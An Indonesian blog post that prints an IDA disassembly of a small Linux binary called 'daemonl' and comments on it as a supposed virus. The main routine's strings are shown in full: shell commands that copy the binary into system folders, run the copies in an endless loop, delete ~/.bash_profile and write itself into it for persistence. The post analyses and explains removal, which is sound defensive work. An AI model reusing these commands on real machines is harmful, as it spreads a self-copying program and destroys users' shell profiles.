+ -

Senin, Juli 11, 2011

daemonl "katanya virus" =)) 

.init:08048294 ;
.init:08048294 ; +-------------------------------------------------------------------------+
.init:08048294 ; ¦     This file is generated by The Interactive Disassembler (IDA)        ¦
.init:08048294 ; ¦     Copyright (c) 2010 by Hex-Rays SA,            ¦
.init:08048294 ; ¦                      Licensed to: Freeware version                      ¦
.init:08048294 ; +-------------------------------------------------------------------------+
.init:08048294 ;
.init:08048294 ; Input MD5   : BBB20B482900C062128F0894D881B286
.init:08048294
.init:08048294 ; File Name   : Z:\media\r00t\daemonl
.init:08048294 ; Format      : ELF (Executable)
.init:08048294 ; Interpreter '/lib/ld-linux.so.2'
.init:08048294 ; Needed Library 'libc.so.6'
.init:08048294 ;
.init:08048294 ; Source File : 'crtstuff.c'
.init:08048294 ; Source File : 'daemonl.c'
.init:08048294
.init:08048294                 .686p
.init:08048294                 .mmx
.init:08048294                 .model flat
.init:08048294 .intel_syntax noprefix
.init:08048294
.init:08048294 ; ---------------------------------------------------------------------------
.init:08048294
.init:08048294 ; Segment type: Pure code
.init:08048294 ; Segment permissions: Read/Execute
.init:08048294 _init           segment dword public 'CODE' use32
.init:08048294                 assume cs:_init
.init:08048294                 ;org 8048294h
.init:08048294                 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.init:08048294
.init:08048294 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.init:08048294
.init:08048294 ; Attributes: bp-based frame
.init:08048294
.init:08048294                 public _init_proc
.init:08048294 _init_proc      proc near               ; CODE XREF: __libc_csu_init+14 p
.init:08048294                 push    ebp             ; _init
.init:08048295                 mov     ebp, esp
.init:08048297                 push    ebx
.init:08048298                 sub     esp, 4
.init:0804829B                 call    $+5
.init:080482A0                 pop     ebx
.init:080482A1                 add     ebx, 1D54h
.init:080482A7                 mov     edx, [ebx-4]
.init:080482AD                 test    edx, edx
.init:080482AF                 jz      short loc_80482B6
.init:080482B1                 call    ___gmon_start__
.init:080482B6
.init:080482B6 loc_80482B6:                            ; CODE XREF: _init_proc+1B j
.init:080482B6                 call    frame_dummy
.init:080482BB                 call    __do_global_ctors_aux
.init:080482C0                 pop     eax
.init:080482C1                 pop     ebx
.init:080482C2                 leave
.init:080482C3                 retn
.init:080482C3 _init_proc      endp
.init:080482C3
.init:080482C3 _init           ends
.init:080482C3
.plt:080482C4 ; ---------------------------------------------------------------------------
.plt:080482C4
.plt:080482C4 ; Segment type: Pure code
.plt:080482C4 ; Segment permissions: Read/Execute
.plt:080482C4 _plt            segment dword public 'CODE' use32
.plt:080482C4                 assume cs:_plt
.plt:080482C4                 ;org 80482C4h
.plt:080482C4                 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.plt:080482C4                 dd 4 dup(?)
.plt:080482D4 ; [00000006 BYTES: COLLAPSED FUNCTION ___gmon_start__. PRESS KEYPAD "+" TO EXPAND]
.plt:080482DA                 dw ?
.plt:080482DC                 dd 2 dup(?)
.plt:080482E4 ; [00000006 BYTES: COLLAPSED FUNCTION _system. PRESS KEYPAD "+" TO EXPAND]
.plt:080482EA                 dw ?
.plt:080482EC                 dd 2 dup(?)
.plt:080482F4 ; [00000006 BYTES: COLLAPSED FUNCTION ___libc_start_main. PRESS KEYPAD "+" TO EXPAND]
.plt:080482FA                 dw ?
.plt:080482FC                 dd 2 dup(?)
.plt:080482FC _plt            ends
.plt:080482FC
.text:08048310 ; ---------------------------------------------------------------------------
.text:08048310
.text:08048310 ; Segment type: Pure code
.text:08048310 ; Segment permissions: Read/Execute
.text:08048310 _text           segment para public 'CODE' use32
.text:08048310                 assume cs:_text
.text:08048310                 ;org 8048310h
.text:08048310                 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.text:08048310
.text:08048310 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:08048310
.text:08048310
.text:08048310                 public _start
.text:08048310 _start          proc near
.text:08048310                 xor     ebp, ebp
.text:08048312                 pop     esi
.text:08048313                 mov     ecx, esp
.text:08048315                 and     esp, 0FFFFFFF0h
.text:08048318                 push    eax
.text:08048319                 push    esp
.text:0804831A                 push    edx
.text:0804831B                 push    offset __libc_csu_fini
.text:08048320                 push    offset __libc_csu_init
.text:08048325                 push    ecx
.text:08048326                 push    esi
.text:08048327                 push    offset main
.text:0804832C                 call    ___libc_start_main
.text:08048331                 hlt
.text:08048332                 nop
.text:08048333                 nop
.text:08048334                 nop
.text:08048335                 nop
.text:08048336                 nop
.text:08048337                 nop
.text:08048338                 nop
.text:08048339                 nop
.text:0804833A                 nop
.text:0804833B                 nop
.text:0804833C                 nop
.text:0804833D                 nop
.text:0804833E                 nop
.text:0804833F                 nop
.text:0804833F _start          endp
.text:0804833F
.text:08048340
.text:08048340 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:08048340
.text:08048340 ; Attributes: bp-based frame
.text:08048340
.text:08048340 __do_global_dtors_aux proc near         ; CODE XREF: _term_proc+13 p
.text:08048340                 push    ebp
.text:08048341                 mov     ebp, esp
.text:08048343                 push    ebx
.text:08048344                 sub     esp, 4
.text:08048347                 cmp     ds:completed_7065, 0
.text:0804834E                 jnz     short loc_804838F
.text:08048350                 mov     eax, ds:dtor_idx_7067
.text:08048355                 mov     ebx, offset __DTOR_END__
.text:0804835A                 sub     ebx, offset __DTOR_LIST__
.text:08048360                 sar     ebx, 2
.text:08048363                 sub     ebx, 1
.text:08048366                 cmp     eax, ebx
.text:08048368                 jnb     short loc_8048388
.text:0804836A                 lea     esi, [esi+0]
.text:08048370
.text:08048370 loc_8048370:                            ; CODE XREF: __do_global_dtors_aux+46 j
.text:08048370                 add     eax, 1
.text:08048373                 mov     ds:dtor_idx_7067, eax
.text:08048378                 call    ds:__DTOR_LIST__[eax*4]
.text:0804837F                 mov     eax, ds:dtor_idx_7067
.text:08048384                 cmp     eax, ebx
.text:08048386                 jb      short loc_8048370
.text:08048388
.text:08048388 loc_8048388:                            ; CODE XREF: __do_global_dtors_aux+28 j
.text:08048388                 mov     ds:completed_7065, 1
.text:0804838F
.text:0804838F loc_804838F:                            ; CODE XREF: __do_global_dtors_aux+E j
.text:0804838F                 add     esp, 4
.text:08048392                 pop     ebx
.text:08048393                 pop     ebp
.text:08048394                 retn
.text:08048394 __do_global_dtors_aux endp
.text:08048394
.text:08048394 ; ---------------------------------------------------------------------------
.text:08048395                 align 10h
.text:080483A0
.text:080483A0 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:080483A0
.text:080483A0 ; Attributes: bp-based frame
.text:080483A0
.text:080483A0 frame_dummy     proc near               ; CODE XREF: _init_proc:loc_80482B6 p
.text:080483A0
.text:080483A0 var_18          = dword ptr -18h
.text:080483A0
.text:080483A0                 push    ebp
.text:080483A1                 mov     ebp, esp
.text:080483A3                 sub     esp, 18h
.text:080483A6                 mov     eax, ds:__JCR_LIST__
.text:080483AB                 test    eax, eax
.text:080483AD                 jz      short locret_80483C1
.text:080483AF                 mov     eax, 0
.text:080483B4                 test    eax, eax
.text:080483B6                 jz      short locret_80483C1
.text:080483B8                 mov     [esp+18h+var_18], offset __JCR_LIST__
.text:080483BF                 call    eax
.text:080483C1
.text:080483C1 locret_80483C1:                         ; CODE XREF: frame_dummy+D j
.text:080483C1                                         ; frame_dummy+16 j
.text:080483C1                 leave
.text:080483C2                 retn
.text:080483C2 frame_dummy     endp
.text:080483C2
.text:080483C2 ; ---------------------------------------------------------------------------
.text:080483C3                 align 4
.text:080483C4
.text:080483C4 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:080483C4
.text:080483C4 ; Attributes: bp-based frame
.text:080483C4
.text:080483C4                 public main
.text:080483C4 main            proc near               ; DATA XREF: _start+17 o
.text:080483C4
.text:080483C4 var_10          = dword ptr -10h
.text:080483C4
.text:080483C4                 push    ebp
.text:080483C5                 mov     ebp, esp
.text:080483C7                 and     esp, 0FFFFFFF0h
.text:080483CA                 sub     esp, 10h        ; string
.text:080483CD                 mov     [esp+10h+var_10], offset aCpDaemonlBoot ; "cp daemonl /boot/"
.text:080483D4                 call    _system
.text:080483D9                 mov     [esp+10h+var_10], offset aCpDaemonlBinSh ; "cp ~/daemonl /bin/; sh -c /bin/daemonl"
.text:080483E0                 call    _system
.text:080483E5                 mov     [esp+10h+var_10], offset aCpBinDaemonlSh ; "cp /bin/daemonl ~/; sh -c ~/daemonl"
.text:080483EC                 call    _system
.text:080483F1                 mov     [esp+10h+var_10], offset aCpBinDaemonlEt ; "cp /bin/daemonl /etc/skel/; sh -c /etc/"...
.text:080483F8                 call    _system
.text:080483FD                 mov     [esp+10h+var_10], offset aCpBinDaemonlLi ; "cp /bin/daemonl /lib/; sh -c /lib/daemo"...
.text:08048404                 call    _system
.text:08048409                 mov     [esp+10h+var_10], offset aCpBinDaemonlVa ; "cp /bin/daemonl /var/run/; sh -c /var/r"...
.text:08048410                 call    _system
.text:08048415
.text:08048415 loc_8048415:                            ; CODE XREF: main+99 j
.text:08048415                 mov     [esp+10h+var_10], offset aDaemonl ; "daemonl"
.text:0804841C                 call    _system
.text:08048421                 mov     [esp+10h+var_10], offset aShCDaemonl ; "sh -c ~/daemonl"
.text:08048428                 call    _system
.text:0804842D                 mov     [esp+10h+var_10], offset aShCLibDaemonl ; "sh -c /lib/daemonl"
.text:08048434                 call    _system
.text:08048439                 mov     [esp+10h+var_10], offset aShCBootDaemonl ; "sh -c /boot/daemonl"
.text:08048440                 call    _system
.text:08048445                 mov     [esp+10h+var_10], offset aRm_bash_profil ; "rm ~/.bash_profile"
.text:0804844C                 call    _system
.text:08048451                 mov     [esp+10h+var_10], offset aEchoDaemonl_ba ; "echo daemonl>>~/.bash_profile"
.text:08048458                 call    _system
.text:0804845D                 jmp     short loc_8048415
.text:0804845D main            endp
.text:0804845D
.text:0804845D ; ---------------------------------------------------------------------------
.text:0804845F                 align 10h
.text:08048460
.text:08048460 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:08048460
.text:08048460 ; Attributes: bp-based frame
.text:08048460
.text:08048460                 public __libc_csu_fini
.text:08048460 __libc_csu_fini proc near               ; DATA XREF: _start+B o
.text:08048460                 push    ebp
.text:08048461                 mov     ebp, esp
.text:08048463                 pop     ebp
.text:08048464                 retn
.text:08048464 __libc_csu_fini endp
.text:08048464
.text:08048464 ; ---------------------------------------------------------------------------
.text:08048465                 align 10h
.text:08048470
.text:08048470 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:08048470
.text:08048470 ; Attributes: bp-based frame
.text:08048470
.text:08048470                 public __libc_csu_init
.text:08048470 __libc_csu_init proc near               ; DATA XREF: _start+10 o
.text:08048470
.text:08048470 var_28          = dword ptr -28h
.text:08048470 var_24          = dword ptr -24h
.text:08048470 var_20          = dword ptr -20h
.text:08048470 arg_0           = dword ptr  8
.text:08048470 arg_4           = dword ptr  0Ch
.text:08048470 arg_8           = dword ptr  10h
.text:08048470
.text:08048470                 push    ebp
.text:08048471                 mov     ebp, esp
.text:08048473                 push    edi
.text:08048474                 push    esi
.text:08048475                 push    ebx
.text:08048476                 call    __i686_get_pc_thunk_bx
.text:0804847B                 add     ebx, 1B79h
.text:08048481                 sub     esp, 1Ch
.text:08048484                 call    _init_proc
.text:08048489                 lea     edi, [ebx-0E0h]
.text:0804848F                 lea     eax, [ebx-0E0h]
.text:08048495                 sub     edi, eax
.text:08048497                 sar     edi, 2
.text:0804849A                 test    edi, edi
.text:0804849C                 jz      short loc_80484C2
.text:0804849E                 xor     esi, esi
.text:080484A0
.text:080484A0 loc_80484A0:                            ; CODE XREF: __libc_csu_init+50 j
.text:080484A0                 mov     eax, [ebp+arg_8]
.text:080484A3                 mov     [esp+28h+var_20], eax
.text:080484A7                 mov     eax, [ebp+arg_4]
.text:080484AA                 mov     [esp+28h+var_24], eax
.text:080484AE                 mov     eax, [ebp+arg_0]
.text:080484B1                 mov     [esp+28h+var_28], eax
.text:080484B4                 call    dword ptr [ebx+esi*4-0E0h]
.text:080484BB                 add     esi, 1
.text:080484BE                 cmp     esi, edi
.text:080484C0                 jb      short loc_80484A0
.text:080484C2
.text:080484C2 loc_80484C2:                            ; CODE XREF: __libc_csu_init+2C j
.text:080484C2                 add     esp, 1Ch
.text:080484C5                 pop     ebx
.text:080484C6                 pop     esi
.text:080484C7                 pop     edi
.text:080484C8                 pop     ebp
.text:080484C9                 retn
.text:080484C9 __libc_csu_init endp
.text:080484C9
.text:080484CA
.text:080484CA ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:080484CA
.text:080484CA
.text:080484CA                 public __i686_get_pc_thunk_bx
.text:080484CA __i686_get_pc_thunk_bx proc near        ; CODE XREF: __libc_csu_init+6 p
.text:080484CA                 mov     ebx, [esp+0]
.text:080484CD                 retn
.text:080484CD __i686_get_pc_thunk_bx endp
.text:080484CD
.text:080484CD ; ---------------------------------------------------------------------------
.text:080484CE                 align 10h
.text:080484D0
.text:080484D0 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:080484D0
.text:080484D0 ; Attributes: bp-based frame
.text:080484D0
.text:080484D0 __do_global_ctors_aux proc near         ; CODE XREF: _init_proc+27 p
.text:080484D0                 push    ebp
.text:080484D1                 mov     ebp, esp
.text:080484D3                 push    ebx
.text:080484D4                 sub     esp, 4
.text:080484D7                 mov     eax, ds:__CTOR_LIST__
.text:080484DC                 cmp     eax, 0FFFFFFFFh
.text:080484DF                 jz      short loc_80484F4
.text:080484E1                 mov     ebx, offset __CTOR_LIST__
.text:080484E6                 db      66h
.text:080484E6                 nop
.text:080484E8
.text:080484E8 loc_80484E8:                            ; CODE XREF: __do_global_ctors_aux+22 j
.text:080484E8                 sub     ebx, 4
.text:080484EB                 call    eax
.text:080484ED                 mov     eax, [ebx]
.text:080484EF                 cmp     eax, 0FFFFFFFFh
.text:080484F2                 jnz     short loc_80484E8
.text:080484F4
.text:080484F4 loc_80484F4:                            ; CODE XREF: __do_global_ctors_aux+F j
.text:080484F4                 add     esp, 4
.text:080484F7                 pop     ebx
.text:080484F8                 pop     ebp
.text:080484F9                 retn
.text:080484F9 __do_global_ctors_aux endp
.text:080484F9
.text:080484F9 ; ---------------------------------------------------------------------------
.text:080484FA                 align 4
.text:080484FA _text           ends
.text:080484FA
.fini:080484FC ; ---------------------------------------------------------------------------
.fini:080484FC
.fini:080484FC ; Segment type: Pure code
.fini:080484FC ; Segment permissions: Read/Execute
.fini:080484FC _fini           segment dword public 'CODE' use32
.fini:080484FC                 assume cs:_fini
.fini:080484FC                 ;org 80484FCh
.fini:080484FC                 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.fini:080484FC
.fini:080484FC ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.fini:080484FC
.fini:080484FC ; Attributes: bp-based frame
.fini:080484FC
.fini:080484FC                 public _term_proc
.fini:080484FC _term_proc      proc near
.fini:080484FC                 push    ebp             ; _fini
.fini:080484FD                 mov     ebp, esp
.fini:080484FF                 push    ebx
.fini:08048500                 sub     esp, 4
.fini:08048503                 call    $+5
.fini:08048508                 pop     ebx
.fini:08048509                 add     ebx, 1AECh
.fini:0804850F                 call    __do_global_dtors_aux
.fini:08048514                 pop     ecx
.fini:08048515                 pop     ebx
.fini:08048516                 leave
.fini:08048517                 retn
.fini:08048517 _term_proc      endp
.fini:08048517
.fini:08048517 _fini           ends
.fini:08048517
.rodata:08048518 ; ---------------------------------------------------------------------------
.rodata:08048518
.rodata:08048518 ; Segment type: Pure data
.rodata:08048518 ; Segment permissions: Read
.rodata:08048518 _rodata         segment dword public 'CONST' use32
.rodata:08048518                 assume cs:_rodata
.rodata:08048518                 ;org 8048518h
.rodata:08048518                 public _fp_hw
.rodata:08048518 _fp_hw          dd 3
.rodata:0804851C                 public _IO_stdin_used
.rodata:0804851C _IO_stdin_used  dd 20001h
.rodata:08048520 aCpDaemonlBoot  db 'cp daemonl /boot/',0 ; DATA XREF: main+9 o
.rodata:08048532                 align 4
.rodata:08048534 aCpDaemonlBinSh db 'cp ~/daemonl /bin/; sh -c /bin/daemonl',0
.rodata:08048534                                         ; DATA XREF: main+15 o
.rodata:0804855B                 align 4
.rodata:0804855C aCpBinDaemonlSh db 'cp /bin/daemonl ~/; sh -c ~/daemonl',0
.rodata:0804855C                                         ; DATA XREF: main+21 o
.rodata:08048580 aCpBinDaemonlEt db 'cp /bin/daemonl /etc/skel/; sh -c /etc/skel/daemonl',0
.rodata:08048580                                         ; DATA XREF: main+2D o
.rodata:080485B4 aCpBinDaemonlLi db 'cp /bin/daemonl /lib/; sh -c /lib/daemonl',0
.rodata:080485B4                                         ; DATA XREF: main+39 o
.rodata:080485DE                 align 10h
.rodata:080485E0 aCpBinDaemonlVa db 'cp /bin/daemonl /var/run/; sh -c /var/run/daemonl',0
.rodata:080485E0                                         ; DATA XREF: main+45 o
.rodata:08048612 aDaemonl        db 'daemonl',0          ; DATA XREF: main:loc_8048415 o
.rodata:0804861A aShCDaemonl     db 'sh -c ~/daemonl',0  ; DATA XREF: main+5D o
.rodata:0804862A aShCLibDaemonl  db 'sh -c /lib/daemonl',0 ; DATA XREF: main+69 o
.rodata:0804863D aShCBootDaemonl db 'sh -c /boot/daemonl',0 ; DATA XREF: main+75 o
.rodata:08048651 aRm_bash_profil db 'rm ~/.bash_profile',0 ; DATA XREF: main+81 o
.rodata:08048664 aEchoDaemonl_ba db 'echo daemonl>>~/.bash_profile',0 ; DATA XREF: main+8D o
.rodata:08048664 _rodata         ends
.rodata:08048664
.eh_frame:08048684 ; ---------------------------------------------------------------------------
.eh_frame:08048684
.eh_frame:08048684 ; Segment type: Pure data
.eh_frame:08048684 ; Segment permissions: Read
.eh_frame:08048684 _eh_frame       segment dword public 'CONST' use32
.eh_frame:08048684                 assume cs:_eh_frame
.eh_frame:08048684                 ;org 8048684h
.eh_frame:08048684 __FRAME_END__   db    0
.eh_frame:08048685                 db    0
.eh_frame:08048686                 db    0
.eh_frame:08048687                 db    0
.eh_frame:08048687 _eh_frame       ends
.eh_frame:08048687
.ctors:08049F14 ; ---------------------------------------------------------------------------
.ctors:08049F14
.ctors:08049F14 ; Segment type: Pure data
.ctors:08049F14 ; Segment permissions: Read/Write
.ctors:08049F14 _ctors          segment dword public 'DATA' use32
.ctors:08049F14                 assume cs:_ctors
.ctors:08049F14                 ;org 8049F14h
.ctors:08049F14 __CTOR_LIST__   dd 0FFFFFFFFh           ; DATA XREF: __do_global_ctors_aux+7 r
.ctors:08049F14                                         ; __do_global_ctors_aux+11 o
.ctors:08049F14                                         ; Alternative name is '__init_array_end'
.ctors:08049F18 __CTOR_END__    db    0
.ctors:08049F19                 db    0
.ctors:08049F1A                 db    0
.ctors:08049F1B                 db    0
.ctors:08049F1B _ctors          ends
.ctors:08049F1B
.dtors:08049F1C ; ---------------------------------------------------------------------------
.dtors:08049F1C
.dtors:08049F1C ; Segment type: Pure data
.dtors:08049F1C ; Segment permissions: Read/Write
.dtors:08049F1C _dtors          segment dword public 'DATA' use32
.dtors:08049F1C                 assume cs:_dtors
.dtors:08049F1C                 ;org 8049F1Ch
.dtors:08049F1C __DTOR_LIST__   dd 0FFFFFFFFh           ; DATA XREF: __do_global_dtors_aux+1A o
.dtors:08049F1C                                         ; __do_global_dtors_aux+38 r
.dtors:08049F20                 public __DTOR_END__
.dtors:08049F20 __DTOR_END__    db    0                 ; DATA XREF: __do_global_dtors_aux+15 o
.dtors:08049F21                 db    0
.dtors:08049F22                 db    0
.dtors:08049F23                 db    0
.dtors:08049F23 _dtors          ends
.dtors:08049F23
.jcr:08049F24 ; ---------------------------------------------------------------------------
.jcr:08049F24
.jcr:08049F24 ; Segment type: Pure data
.jcr:08049F24 ; Segment permissions: Read/Write
.jcr:08049F24 _jcr            segment dword public 'DATA' use32
.jcr:08049F24                 assume cs:_jcr
.jcr:08049F24                 ;org 8049F24h
.jcr:08049F24 __JCR_LIST__    dd 0                    ; DATA XREF: frame_dummy+6 r
.jcr:08049F24                                         ; frame_dummy+18 o
.jcr:08049F24 _jcr            ends
.jcr:08049F24
.got:08049FF0 ; ---------------------------------------------------------------------------
.got:08049FF0
.got:08049FF0 ; Segment type: Pure data
.got:08049FF0 ; Segment permissions: Read/Write
.got:08049FF0 _got            segment dword public 'DATA' use32
.got:08049FF0                 assume cs:_got
.got:08049FF0                 ;org 8049FF0h
.got:08049FF0                 dd offset __gmon_start__
.got:08049FF0 _got            ends
.got:08049FF0
.got.plt:08049FF4 ; ---------------------------------------------------------------------------
.got.plt:08049FF4
.got.plt:08049FF4 ; Segment type: Pure data
.got.plt:08049FF4 ; Segment permissions: Read/Write
.got.plt:08049FF4 _got_plt        segment dword public 'DATA' use32
.got.plt:08049FF4                 assume cs:_got_plt
.got.plt:08049FF4                 ;org 8049FF4h
.got.plt:08049FF4 _GLOBAL_OFFSET_TABLE_ db    ? ;
.got.plt:08049FF5                 db    ? ;
.got.plt:08049FF6                 db    ? ;
.got.plt:08049FF7                 db    ? ;
.got.plt:08049FF8                 db    ? ;
.got.plt:08049FF9                 db    ? ;
.got.plt:08049FFA                 db    ? ;
.got.plt:08049FFB                 db    ? ;
.got.plt:08049FFC                 db    ? ;
.got.plt:08049FFD                 db    ? ;
.got.plt:08049FFE                 db    ? ;
.got.plt:08049FFF                 db    ? ;
.got.plt:0804A000 off_804A000     dd offset __gmon_start__ ; DATA XREF: ___gmon_start__ r
.got.plt:0804A004 off_804A004     dd offset system        ; DATA XREF: _system r
.got.plt:0804A008 off_804A008     dd offset __libc_start_main
.got.plt:0804A008                                         ; DATA XREF: ___libc_start_main r
.got.plt:0804A008 _got_plt        ends
.got.plt:0804A008
.data:0804A00C ; ---------------------------------------------------------------------------
.data:0804A00C
.data:0804A00C ; Segment type: Pure data
.data:0804A00C ; Segment permissions: Read/Write
.data:0804A00C _data           segment dword public 'DATA' use32
.data:0804A00C                 assume cs:_data
.data:0804A00C                 ;org 804A00Ch
.data:0804A00C                 public data_start ; weak
.data:0804A00C data_start      db    0                 ; Alternative name is '__data_start'
.data:0804A00D                 db    0
.data:0804A00E                 db    0
.data:0804A00F                 db    0
.data:0804A010                 public __dso_handle
.data:0804A010 __dso_handle    db    0
.data:0804A011                 db    0
.data:0804A012                 db    0
.data:0804A013                 db    0
.data:0804A013 _data           ends
.data:0804A013
.bss:0804A014 ; ---------------------------------------------------------------------------
.bss:0804A014
.bss:0804A014 ; Segment type: Uninitialized
.bss:0804A014 ; Segment permissions: Read/Write
.bss:0804A014 _bss            segment dword public 'BSS' use32
.bss:0804A014                 assume cs:_bss
.bss:0804A014                 ;org 804A014h
.bss:0804A014                 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.bss:0804A014 completed_7065  db ?                    ; DATA XREF: __do_global_dtors_aux+7 r
.bss:0804A014                                         ; __do_global_dtors_aux:loc_8048388 w
.bss:0804A015                 align 4
.bss:0804A018 dtor_idx_7067   dd ?                    ; DATA XREF: __do_global_dtors_aux+10 r
.bss:0804A018                                         ; __do_global_dtors_aux+33 w ...
.bss:0804A018 _bss            ends
.bss:0804A018
extern:804A01C ; ---------------------------------------------------------------------------
extern:804A01C
extern:804A01C ; Segment type: Externs
extern:804A01C ; extern
extern:804A01C                 extrn system@@GLIBC_2_0:near
extern:804A020                 extrn __libc_start_main@@GLIBC_2_0:near
extern:804A024 ; int system(const char *string)
extern:804A024                 extrn system:near       ; DATA XREF: .got.plt:off_804A004 o
extern:804A028                 extrn __libc_start_main:near
extern:804A028                                         ; DATA XREF: .got.plt:off_804A008 o
extern:804A02C                 extrn __gmon_start__ ; weak ; DATA XREF: .got:08049FF0 o
extern:804A02C                                         ; .got.plt:off_804A000 o
extern:804A030                 extrn _Jv_RegisterClasses ; weak
extern:804A030
abs:804A130 ; ---------------------------------------------------------------------------
abs:804A130
abs:804A130 ; Segment type: Absolute symbols
abs:804A130 ; abs
abs:804A130                 public __bss_start
abs:804A130 __bss_start     = 804A014h
abs:804A134                 public _end
abs:804A134 _end            = 804A01Ch
abs:804A138                 public _edata
abs:804A138 _edata          = 804A014h
abs:804A138
abs:804A138
abs:804A138                 end _start

===========================================================================================================




perhatikan strings ini : 

.text:080483C4 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:080483C4
.text:080483C4 ; Attributes: bp-based frame
.text:080483C4
.text:080483C4                 public main
.text:080483C4 main            proc near               ; DATA XREF: _start+17 o
.text:080483C4
.text:080483C4 var_10          = dword ptr -10h
.text:080483C4
.text:080483C4                 push    ebp
.text:080483C5                 mov     ebp, esp
.text:080483C7                 and     esp, 0FFFFFFF0h
.text:080483CA                 sub     esp, 10h        ; string
.text:080483CD                 mov     [esp+10h+var_10], offset aCpDaemonlBoot ; "cp daemonl /boot/"
.text:080483D4                 call    _system
.text:080483D9                 mov     [esp+10h+var_10], offset aCpDaemonlBinSh ; "cp ~/daemonl /bin/; sh -c /bin/daemonl"
.text:080483E0                 call    _system
.text:080483E5                 mov     [esp+10h+var_10], offset aCpBinDaemonlSh ; "cp /bin/daemonl ~/; sh -c ~/daemonl"
.text:080483EC                 call    _system
.text:080483F1                 mov     [esp+10h+var_10], offset aCpBinDaemonlEt ; "cp /bin/daemonl /etc/skel/; sh -c /etc/"...
.text:080483F8                 call    _system
.text:080483FD                 mov     [esp+10h+var_10], offset aCpBinDaemonlLi ; "cp /bin/daemonl /lib/; sh -c /lib/daemo"...
.text:08048404                 call    _system
.text:08048409                 mov     [esp+10h+var_10], offset aCpBinDaemonlVa ; "cp /bin/daemonl /var/run/; sh -c /var/r"...
.text:08048410                 call    _system
.text:08048415
.text:08048415 loc_8048415:                            ; CODE XREF: main+99 j
.text:08048415                 mov     [esp+10h+var_10], offset aDaemonl ; "daemonl"
.text:0804841C                 call    _system
.text:08048421                 mov     [esp+10h+var_10], offset aShCDaemonl ; "sh -c ~/daemonl"
.text:08048428                 call    _system
.text:0804842D                 mov     [esp+10h+var_10], offset aShCLibDaemonl ; "sh -c /lib/daemonl"
.text:08048434                 call    _system
.text:08048439                 mov     [esp+10h+var_10], offset aShCBootDaemonl ; "sh -c /boot/daemonl"
.text:08048440                 call    _system
.text:08048445                 mov     [esp+10h+var_10], offset aRm_bash_profil ; "rm ~/.bash_profile"
.text:0804844C                 call    _system
.text:08048451                 mov     [esp+10h+var_10], offset aEchoDaemonl_ba ; "echo daemonl>>~/.bash_profile"
.text:08048458                 call    _system
.text:0804845D                 jmp     short loc_8048415
.text:0804845D main            endp
.text:0804845D
.text:0804845D ; ---------------------------------------------------------------------------
.text:0804845F                 align 10h
.text:08048460
.text:08048460 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦




saat di jalankan memang file daemonl tercopy k folder-folder tersebut & menciptakan .bash_profile
tapi untungny saya tidak menggunakan bash_profile..wekzz.,.:D 
tinggal di hapus2 sajha...:), file daemonl nya...jgn lupa cek proses yang berjalan di mesin anda...:)
saya bukan seorang virus maker...:D, 
maav kalo tidak bisa menjelaskan lebih jauh.,..
maksud dari heker yg kita sebut sajha bunga ini :D, membuat script seperti itu..:p

no system perfect
 
mirror : http://ibmtech.net/yur4kh4/daemonl.txt
regards : yur4kh4
5 el faqih: daemonl "katanya virus" =)) .init:08048294 ; .init:08048294 ; +-------------------------------------------------------------------------+ .init:08048294 ; ¦ This f...

Tidak ada komentar:

Posting Komentar

silahkan berkomentar...

< >
Langganan: Posting Komentar (Atom)